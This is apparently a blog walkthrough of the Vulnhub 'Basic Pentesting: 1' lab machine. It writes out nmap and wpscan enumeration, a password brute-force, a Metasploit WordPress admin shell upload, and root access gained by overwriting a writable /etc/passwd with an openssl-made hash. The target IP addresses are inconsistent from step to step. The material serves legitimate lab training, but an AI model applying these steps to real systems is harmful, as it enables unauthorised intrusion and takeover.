This Walkthrough is on Basic Pentesting: 1 Vulnhub Machine made by Josiah Pierce. It contains multiple remote vulnerabilities and multiple privilege escalation vectors. For more details or for downloading the machine go here.

Steps for downloading:

Click on the given link it will redirect you too the vulnhub page where you can download the machine.
Click on the download mirror link to download the file .
After downloading the file ,click on the file it will automatically open in virtual box (which i am using) or right click on the file and in the options use open with and select virtual box or the virtual environment your using.
After setting up the requirements ,Give Finish
Go to Settings and click on Network and and change the settings to Host only Adapter and in the name chose vboxnet0 . if you can’t see the option as vboxnet0 you should create one
Go to tools in virtualbox and click on host only adapter and Click on create .now its created you can go to settings and network and do select the vboxnet0.
If your using kali linux in virtual box then you should use NAT Network in the Network settings .if you don’t see the name there .Then you should create one using the above step by selecting NAT Network and creating a new NAT network .You should keep the vulnhub machine in the same NAT Network

After changing the settings now click on start

After downloading and setting up the machine . we need to know the ip of the target machine which is in our network so we use ifconfig to find out in which ip we are in so we can use ping scan to find out target ip .

I started scanning the entire network using nmap tool which is pre-installed in kali linux, and got few machines running in this network

After checking out each and every IP using nmap -O which is for OS detection i got know my target IP is 192.68.56.101.I used nmap to find an open port of the target using.

nmap -A -sV -P -T4 192.168.56.101

From this we can see the following ports and services:

port 21/tcp — FTP — (ProFTPD 1.3.3c)
port 22/tcp — SSH — (OpenSSH 7.2p2 Ubuntu)
port 80/tcp — HTTP — (Apache httpd 2.4.18)\

we have found 3 open ports that run services FTP, SSH, and HTTP on the target.I will check with the HTTP service

Nothing interesting on this page ,no much details so I will go for subdirectories of that target by using dirbuster tool which is already pre-installed on Kali Linux.

dirb http://192.168.56.101/

I got a valid URL https://192.168.56.105/secret/

After visiting the URL , I observe that all the links referred to the domain called “vtcsec”. But it seems to be down, I think this machine is meant to be “vtcsec” host, So for seeing this website with full content, I’ll add “vtcsec” on my host file and try again.

Get Akash’s stories in your inbox

Join Medium for free to get updates from this writer.

Add the target IP address and the hostname “vtcsec” in the host file which is located at /etc/hosts. here we have used nano text editor to add the IP and host name

nano /etc/hosts
cat /etc/hosts

After adding the IP and host name and refreshing the page this is what i got.

The link to the log in panel can then be found on the right-hand side near the bottom of this page:

The next step is to enumerate any potential users and vulnerabilities in the site by using wpscan:

wpscan --url http://192.168.56.103/secret/ --enumerate u

This revealed a number of vulnerabilities and that the default WordPress username of ‘admin’ is still in use :

wpscan --url http://192.168.56.109/secret/ -U admin -P /usr/share/wordlists/rockyou.txt

With the default username being ‘admin’ it’s worth trying to log in with the default password as ‘admin’ too… sure enough, this works

Now we have admin access to the WordPress site, Metasploit can be used to generate a plugin which will automatically upload a payload and give us a shell which helps to get the remote connection of target. The module we used was wp_admin_shell_upload

use exploit/unix/webapp/wp_admin_shell_upload

As we can see password ,rhosts & username are not set we should set it

The exploit(run) should executed successfully and open a meterpreter session. Running a getuid command from this session (or id from a shell) shows we currently have access as the user: www-data. Therefore, some additional work is required to obtain root access

we get into shell by using shell command and by using “which python” to find the path to it and to check our target has been installed python or not and by running python script python -c ‘import pty;pty.spawn(“/bin/bash”)’ which is used for interacting with the shell and use su root -l to get into root access.Still, I haven’t reached the root, So I went back to meterpreter session.

python -c 'import pty;pty.spawn("/bin/bash")'
su root -l

I check for file permission of etc/passwd, Here got that the file was read and write permission now I can modify the user for root privileges.Download passwd file on my machine located to /home/vulnhub directory

ls -l /etc/passwd
download /etc/passwd /home/vulnhub

Now the downloaded file is in the /home/vulnhub/passwd so i open new tab and get into that directory and list the files and use cat to see the contents in the file we use grep to filter our search

cd /home/vulnhub/
ls
cat passwd | grep root

To generate encrypted password I used openssl and MD-5 based algorithm(-1) “openssl passwd -1 <password>“.

then I got the encrypted password, After that open the passwd file and replace it with a new password of the root user which was generated by openssl.

openssl passwd -1 hello

after modifying the passwd file, then upload back to the target machine.

It asks for a root password, I gave the password as “hello” which was generated by openssl. Yeah, successfully we get root privileges access of the target.

upload /home/vulnhub/passwd /etc/passwdpython -c 'import pty;pty.spawn("/bin/bash")'

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

Disclaimer:

We believe that these Practices will educate everyone about ethical hacking, and We do not promote, encourage, support, or excite any illegal activity or hacking.

We will not be responsible for your illegal actions.

Akash L

Trainer & Security Researcher

Razz Security Academy

Basic Pentesting -1 Walkthrough | Vulnhub

Get Akash’s stories in your inbox

Akash L